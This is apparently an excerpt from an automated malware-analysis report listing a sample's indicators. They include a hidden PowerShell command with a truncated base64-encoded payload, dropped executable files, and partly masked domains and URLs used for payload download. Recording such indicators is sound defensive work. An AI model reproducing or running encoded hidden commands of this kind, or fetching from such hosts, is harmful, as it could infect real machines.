Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABaAGkAegBvAG8AbQBrAHoAYwA9ACcAQQBzAG0AcwBiAG8AeABvAG0AagByACcAOwAkAEQAdQB2AHEAbABzAHoAdwBwAHYAIAA9ACAAJwA2ADAAOAAnADsAJABNAHgAZwB0AGwAZABsAGQAeQA9ACcARwB1AHUAaABuAGoAZwBjAGUAdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1464
- %TEMP%\725248.cvr
- %HOMEPATH%\608.exe
- 'ev###edself.com':80
- 'ev###edself.com':443
- 'er###antum.com':80
- 'er###antum.com':443
- 'st####entpro.com':80
- http://ev###edself.com/dir/523arw979/
- http://www.er###antum.com/scripts/t647/
- http://st####entpro.com/25bd/a49/
- http://www.st####entpro.com/25bd/a49/
- 'ev###edself.com':443
- 'er###antum.com':443
- DNS ASK ma####atnandina.com
- DNS ASK pi####intgarage.com
- DNS ASK ev###edself.com
- DNS ASK er###antum.com
- DNS ASK st####entpro.com